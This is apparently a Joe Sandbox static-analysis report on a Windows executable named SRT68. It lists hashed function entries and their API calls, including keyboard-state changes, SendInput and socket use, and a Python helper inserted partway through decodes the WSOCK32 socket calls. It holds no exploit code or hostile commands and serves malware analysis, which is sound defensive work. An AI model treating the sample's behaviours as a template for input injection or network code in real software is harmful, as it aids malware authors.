                                                                      • Opcode ID: 3f01d1b1cbb78d55a91afd71bc3292c978ea7fbfcbe0069d8a7c3a127c8dc404
                                                                      • Instruction ID: c76df6713682dbe8d128e495d3b2a9e63abeae79bffa33b9aaa9b4d340681a5b
                                                                      • Opcode Fuzzy Hash: 3f01d1b1cbb78d55a91afd71bc3292c978ea7fbfcbe0069d8a7c3a127c8dc404
                                                                      • Instruction Fuzzy Hash: 77C157716083018FC755DF28C880A6EBBE4FF89714F04896EF9999B351D739E946CB82
                                                                      APIs
                                                                      • CoInitialize.OLE32(00000000), ref: 010180C3
                                                                      • CoUninitialize.OLE32 ref: 010180CE
                                                                        • Part of subcall function 00FFD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FFD5D4
                                                                      • VariantInit.OLEAUT32(?), ref: 010180D9
                                                                      • VariantClear.OLEAUT32(?), ref: 010183AA
                                                                      Similarity
                                                                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                      • String ID:
                                                                      • API String ID: 780911581-0
                                                                      • Opcode ID: 7b5e4a69c46e27b8e8de1d905f5d0cdf7c2d28b04468ca7ab37be8844c5b5241
                                                                      • Instruction ID: 636f1d1d8a74bc13468f014af4767e2d9206f75167215ca2bbd0e27857cf1261
                                                                      • Opcode Fuzzy Hash: 7b5e4a69c46e27b8e8de1d905f5d0cdf7c2d28b04468ca7ab37be8844c5b5241
                                                                      • Instruction Fuzzy Hash: 68A169752047019FDB50DF54C881B6AB7E4BF8A354F48845DFA969B3A1CB78EE04CB82
                                                                      APIs
                                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,01032C7C,?), ref: 00FF76EA
                                                                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,01032C7C,?), ref: 00FF7702
                                                                      • CLSIDFromProgID.OLE32(?,?,00000000,0102FB80,000000FF,?,00000000,00000800,00000000,?,01032C7C,?), ref: 00FF7727
                                                                      • _memcmp.LIBCMT ref: 00FF7748
                                                                      Similarity
                                                                      • API ID: FromProg$FreeTask_memcmp
                                                                      • String ID:
                                                                      • API String ID: 314563124-0
                                                                      • Opcode ID: 1ae52d5e116c0ff9dec3657765858db47d7db4d704a7412ac742b33b4a26dcaf
                                                                      • Instruction ID: 962e0c32296557c41c534b5dc2288577ec22e2d98fc629899a2c084164a0622d
                                                                      • Opcode Fuzzy Hash: 1ae52d5e116c0ff9dec3657765858db47d7db4d704a7412ac742b33b4a26dcaf
                                                                      • Instruction Fuzzy Hash: 0181FE75900209EFCB04DFA4C984DEEB7B9FF89315F244558E505EB260DB71AE05DB60
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$AllocClearCopyInitString
                                                                      • String ID:
                                                                      • API String ID: 2808897238-0
                                                                      • Opcode ID: d52f1f92745349006cb85a6da59485be2332c309931f9b3fb9eef3e75b40973e
                                                                      • Instruction ID: d857bd3db42298a20ad0b0e7a462307d019170df689a162411b4d47fc0bc5e43
                                                                      • Opcode Fuzzy Hash: d52f1f92745349006cb85a6da59485be2332c309931f9b3fb9eef3e75b40973e
                                                                      • Instruction Fuzzy Hash: 5551D375B0430ADADB24AF65D891B3EB3E5AF45310F20C81FE696DB2A1DF78D841A710
                                                                      APIs
                                                                      • GetWindowRect.USER32(0158D910,?), ref: 01029863
                                                                      • ScreenToClient.USER32(00000002,00000002), ref: 01029896
                                                                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 01029903
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ClientMoveRectScreen
                                                                      • String ID:
                                                                      • API String ID: 3880355969-0
                                                                      • Opcode ID: 49af3bffc4e4290ee30487f6d9e2dfcf39a93588bb83ee570a3efe027cf1bbaf
                                                                      • Instruction ID: 053e7130836c370abaf3f0ff2082af8a8f0cd308cce23a6317b3524aae207b9d
                                                                      • Opcode Fuzzy Hash: 49af3bffc4e4290ee30487f6d9e2dfcf39a93588bb83ee570a3efe027cf1bbaf
                                                                      • Instruction Fuzzy Hash: 6E518274A00229EFCF21CF6CC884AAE7BF5FF45364F148199F8959B291D771A981CB90
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00FF9AD2
                                                                      • __itow.LIBCMT ref: 00FF9B03
                                                                        • Part of subcall function 00FF9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00FF9DBE
                                                                      • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00FF9B6C
                                                                      • __itow.LIBCMT ref: 00FF9BC3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$__itow
                                                                      • String ID:
                                                                      • API String ID: 3379773720-0
                                                                      • Opcode ID: f9d81ed1d44f34ba0a9cd14cb99eb071b829b9f49470244b7acb57631c8b2479
                                                                      • Instruction ID: 7bebb116de7114108ed9ee0e2e49ba93f267805cd3db362cc90ed52fe2af9474
                                                                      • Opcode Fuzzy Hash: f9d81ed1d44f34ba0a9cd14cb99eb071b829b9f49470244b7acb57631c8b2479
                                                                      • Instruction Fuzzy Hash: 0B417070A0420DABDF21EF54DC45FFE7BB9EF89760F000059BA05662A1DBB49A44DBA1
                                                                      APIs
                                                                      • socket.WSOCK32(00000002,00000002,00000011), ref: 010169D1
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 010169E1
                                                                        • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                        • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01016A45
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 01016A51
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$__itow__swprintfsocket
                                                                      • String ID:
                                                                      • API String ID: 2214342067-0
                                                                      • Opcode ID: 4b3e7810abb3deeb962cad285bd0ac4ff16247eea6f878ca8f6ad2abadd2f889
                                                                      • Instruction ID: 4c96861e6ca6a6b9eaccb3beebe3b0876a689cb9eb61e7098c91be7d6b401e32
                                                                      • Opcode Fuzzy Hash: 4b3e7810abb3deeb962cad285bd0ac4ff16247eea6f878ca8f6ad2abadd2f889
                                                                      • Instruction Fuzzy Hash: 5E41A2B57402006FEB60AF24CC86F7A77E49F05B54F44806CFA599B2C2DAF99D019B91
                                                                      APIs
                                                                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0102F910), ref: 010164A7
                                                                      • _strlen.LIBCMT ref: 010164D9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _strlen
                                                                      • String ID:
                                                                      • API String ID: 4218353326-0
                                                                      • Opcode ID: af98f00daafc8c09d59be43094798a9c47f341df4e88fbba293d3c16b841c0ac
                                                                      • Instruction ID: bc751d0a623a5ef5aeafce9de95f406746a7251dd97f8705b9092f2f0653c787
                                                                      • Opcode Fuzzy Hash: af98f00daafc8c09d59be43094798a9c47f341df4e88fbba293d3c16b841c0ac
                                                                      • Instruction Fuzzy Hash: 1E410671600105ABCB10EBA8DC85FFEB7F8AF05310F048159F95A9B296DF78AD04DB50
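The two WSOCK32 entries above name their imports by export ordinal (#21, #16) and give every argument as raw hex, which hides what the code is actually doing. The following Python is an added example, not part of the Joe Sandbox report and not code from the sample: it parses the three socket-related call lines exactly as printed above (copied here as constructed input), resolves the wsock32.dll ordinals from the Winsock 1.1 export table, and decodes the enumerated arguments from the Winsock header constants. The ordinal table and constant values are standard; the helper names and output layout are this example's own.

```python
import re

# Constructed sample input: the three WSOCK32 call lines from the function entries
# above, copied without the leading bullet. Argument values in these listings are
# hex, and "?" marks an argument the static analysis could not recover.
SAMPLE_LINES = [
    "socket.WSOCK32(00000002,00000002,00000011), ref: 010169D1",
    "#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01016A45",
    "#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0102F910), ref: 010164A7",
]

# Export ordinals of wsock32.dll for the Winsock 1.1 functions (ws2_32.dll keeps the
# same numbers for these). Needed because the report names these imports by ordinal.
WSOCK32_ORDINALS = {
    1: "accept", 2: "bind", 3: "closesocket", 4: "connect", 5: "getpeername",
    6: "getsockname", 7: "getsockopt", 8: "htonl", 9: "htons", 10: "inet_addr",
    11: "inet_ntoa", 12: "ioctlsocket", 13: "listen", 14: "ntohl", 15: "ntohs",
    16: "recv", 17: "recvfrom", 18: "select", 19: "send", 20: "sendto",
    21: "setsockopt", 22: "shutdown", 23: "socket",
}

# Winsock constants for the arguments worth decoding (from winsock2.h / ws2def.h).
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
IPPROTO = {0: "IPPROTO_IP", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}
LEVEL = {0xFFFF: "SOL_SOCKET", 6: "IPPROTO_TCP"}
SO_OPT = {0x0004: "SO_REUSEADDR", 0x0008: "SO_KEEPALIVE", 0x0020: "SO_BROADCAST",
          0x0080: "SO_LINGER", 0x1005: "SO_SNDTIMEO", 0x1006: "SO_RCVTIMEO"}
MSG_FLAGS = {0x1: "MSG_OOB", 0x2: "MSG_PEEK"}

CALL_RE = re.compile(
    r"^(?:#(?P<ordinal>\d+)|(?P<name>[A-Za-z_]\w*))\.(?P<module>\w+)"
    r"\((?P<args>[^)]*)\)(?:,\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?"
)


def parse_call(line):
    """Split one 'Name.MODULE(args), ref: addr' line into name, module, args and ref.

    Ordinal imports (#N) are resolved for WSOCK32; unrecovered args ('?') become None."""
    m = CALL_RE.match(line.strip().lstrip("•").strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox API line: {line!r}")
    module = m.group("module").upper()
    if m.group("ordinal") is not None:
        ordinal = int(m.group("ordinal"))
        name = WSOCK32_ORDINALS.get(ordinal, f"#{ordinal}") if module == "WSOCK32" else f"#{ordinal}"
    else:
        name = m.group("name")
    raw = m.group("args")
    args = [None if a == "?" else int(a, 16) for a in raw.split(",")] if raw else []
    return {"name": name, "module": module, "args": args, "ref": m.group("ref")}


def _sym(table, value):
    # Symbolic name when known, hex otherwise, "?" when the analysis lost the value.
    if value is None:
        return "?"
    return table.get(value, f"0x{value:X}")


def _flags(value):
    # recv/send flags are a bit mask, so decode each known bit and keep any remainder.
    if value is None:
        return "?"
    if value == 0:
        return "0"
    names = [n for bit, n in MSG_FLAGS.items() if value & bit]
    rest = value & ~sum(MSG_FLAGS)
    if rest:
        names.append(f"0x{rest:X}")
    return "|".join(names)


def decode_args(call):
    """Decode the enumerated arguments of the socket calls seen in the report."""
    a = call["args"] + [None] * 5          # pad so short or garbled arg lists index safely
    name = call["name"]
    if name == "socket":
        return {"af": _sym(AF, a[0]), "type": _sym(SOCK_TYPE, a[1]), "protocol": _sym(IPPROTO, a[2])}
    if name == "setsockopt":
        level = _sym(LEVEL, a[1])
        # SO_* names only apply at SOL_SOCKET; other levels are left as hex.
        optname = _sym(SO_OPT, a[2]) if level == "SOL_SOCKET" else _sym({}, a[2])
        return {"level": level, "optname": optname, "optlen": a[4]}
    if name in ("recv", "send"):
        return {"flags": _flags(a[3])}
    return {}


def decode_report_lines(lines):
    """Return [{'name', 'ref', 'decoded'}] for each API line, in report order."""
    out = []
    for line in lines:
        call = parse_call(line)
        out.append({"name": call["name"], "ref": call["ref"], "decoded": decode_args(call)})
    return out


if __name__ == "__main__":
    for entry in decode_report_lines(SAMPLE_LINES):
        print(f"{entry['name']:<11} @ {entry['ref']}: {entry['decoded']}")
```

Run on the three lines above, this resolves them to socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP) at 010169D1, setsockopt(s, SOL_SOCKET, SO_BROADCAST, &opt, 4) at 01016A45, and recv(s, buf, len, 0) at 010164A7: a UDP socket with broadcast enabled in one function and a plain blocking receive in another. That is the shape of a script runtime's generic UDP support rather than a hand-written C2 channel, which is consistent with the "compiled AutoIt script" signature in the report overview; the interpretation is this example's, not the report's. The "?" placeholders are values the static pass could not recover, so the socket handle and buffer pointers are not claimed here.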
                                                                      APIs
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0100B89E
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 0100B8C4
                                                                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0100B8E9
                                                                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0100B915
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CreateHardLink$DeleteErrorFileLast
                                                                      • String ID:
                                                                      • API String ID: 3321077145-0
                                                                      • Opcode ID: b2c028525bcf09374605f30f2b4e3cec5764d6d10293cd4d98f1534827ab5621
                                                                      • Instruction ID: 85ddb17dbafe979cc5060cfad7dc7881945d83faeeac2a4e25d989cbe71e8134
                                                                      • Opcode Fuzzy Hash: b2c028525bcf09374605f30f2b4e3cec5764d6d10293cd4d98f1534827ab5621
                                                                      • Instruction Fuzzy Hash: CE413979600611DFCB11EF14C484A5EBBE1EF4A310F598098EC8A9B362CB78FD01DB91
                                                                      APIs
                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 010288DE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: InvalidateRect
                                                                      • String ID:
                                                                      • API String ID: 634782764-0
                                                                      • Opcode ID: fb6d6e42037d7585d108dc53f86f6ae6472b00a4f582413ce3d7a6f80a9042fb
                                                                      • Instruction ID: af9b092e59382c41a020751ee352e0a067b55666af03f51e2657114ad043bed4
                                                                      • Opcode Fuzzy Hash: fb6d6e42037d7585d108dc53f86f6ae6472b00a4f582413ce3d7a6f80a9042fb
                                                                      • Instruction Fuzzy Hash: 7031E13C700129BEEB719E68DC44BAC7BE5EB0A350F588143FAD1E61A1C67595408B52
                                                                      APIs
                                                                      • ClientToScreen.USER32(?,?), ref: 0102AB60
                                                                      • GetWindowRect.USER32(?,?), ref: 0102ABD6
                                                                      • PtInRect.USER32(?,?,0102C014), ref: 0102ABE6
                                                                      • MessageBeep.USER32(00000000), ref: 0102AC57
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                                      • String ID:
                                                                      • API String ID: 1352109105-0
                                                                      • Opcode ID: 371df91ee05abf8eb191e48e6c958738b8402a733ead1c002a383e435fbaf6ab
                                                                      • Instruction ID: 0ad00a57d7021eee7b3ae802ecace40512317ed5a24c9bf7e3677f94b0c0fa4c
                                                                      • Opcode Fuzzy Hash: 371df91ee05abf8eb191e48e6c958738b8402a733ead1c002a383e435fbaf6ab
                                                                      • Instruction Fuzzy Hash: 6441B130700129DFCB22CF58C884BA9BBF5FF88750F2484A9E9949F655CB31E841CB90
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 01000B27
                                                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 01000B43
                                                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 01000BA9
                                                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 01000BFB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      • Opcode ID: c3d5677d1437927bfbd520174d34b9a7c57e03a58e8045e67f232e9a19a49063
                                                                      • Instruction ID: 6f8eab147665d3ad018cb6e6cc2d3a5e7b2f9dafa5bc3adba9d6d5814e443391
                                                                      • Opcode Fuzzy Hash: c3d5677d1437927bfbd520174d34b9a7c57e03a58e8045e67f232e9a19a49063
                                                                      • Instruction Fuzzy Hash: B5314830E44A18AEFB338E2D8C05BFEBBE5AF45394F08439AF6C1521D9C3B985449751
                                                                      APIs
                                                                      • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 01000C66
                                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 01000C82
                                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 01000CE1
                                                                      • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 01000D33
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      • Opcode ID: bf28746bb2148bbcc1d5234c529601c83434a65179ec8be9b95626d6b4abfe98
                                                                      • Instruction ID: 9978a57d852dea6097c1082b9447465264bec6b29fe97bc91151494036d80b6a
                                                                      • Opcode Fuzzy Hash: bf28746bb2148bbcc1d5234c529601c83434a65179ec8be9b95626d6b4abfe98
                                                                      • Instruction Fuzzy Hash: 5E31353090031C6EFF368B28C818BFEBBA6AF45350F04439BF5C1521D9C379954587A2
                                                                      APIs
                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00FD61FB
                                                                      • __isleadbyte_l.LIBCMT ref: 00FD6229
                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FD6257
                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FD628D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                      • String ID:
                                                                      • API String ID: 3058430110-0
                                                                      • Opcode ID: 85eeef74336b30b112b17685d9bb219faa29d2a50cd205f61fe59ffd9fda4a16
                                                                      • Instruction ID: eb655e4eb92fa0893275b34a19ba85d4fc97ab3e5fcac78988f30f6f1ba3d689
                                                                      • Opcode Fuzzy Hash: 85eeef74336b30b112b17685d9bb219faa29d2a50cd205f61fe59ffd9fda4a16
                                                                      • Instruction Fuzzy Hash: 7931E131A00246AFDF218F64CC45BBA7BBAFF42761F19402AF864D7291D731D950EB90
                                                                      APIs
                                                                      • GetForegroundWindow.USER32 ref: 01024F02
                                                                        • Part of subcall function 01003641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0100365B
                                                                        • Part of subcall function 01003641: GetCurrentThreadId.KERNEL32 ref: 01003662
                                                                        • Part of subcall function 01003641: AttachThreadInput.USER32(00000000,?,01005005), ref: 01003669
                                                                      • GetCaretPos.USER32(?), ref: 01024F13
                                                                      • ClientToScreen.USER32(00000000,?), ref: 01024F4E
                                                                      • GetForegroundWindow.USER32 ref: 01024F54
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                      • String ID:
                                                                      • API String ID: 2759813231-0
                                                                      • Opcode ID: 8bfe4f71ba5b4a3cb7bcf9a44daa0756dd9f3a4bb6907e0d095e1e5cda2e5485
                                                                      • Instruction ID: 98f26d07a881fa05944991c020eaf701ecea21befdfa60737c48f09ca721c415
                                                                      • Opcode Fuzzy Hash: 8bfe4f71ba5b4a3cb7bcf9a44daa0756dd9f3a4bb6907e0d095e1e5cda2e5485
                                                                      • Instruction Fuzzy Hash: FE310DB1D00109AFDB10EFA5CC859EFB7F9EF99300F10406AE555E7241DAB99E458BA0
                                                                      APIs
                                                                        • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
                                                                      • GetCursorPos.USER32(?), ref: 0102C4D2
                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00FDB9AB,?,?,?,?,?), ref: 0102C4E7
                                                                      • GetCursorPos.USER32(?), ref: 0102C534
                                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00FDB9AB,?,?,?), ref: 0102C56E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
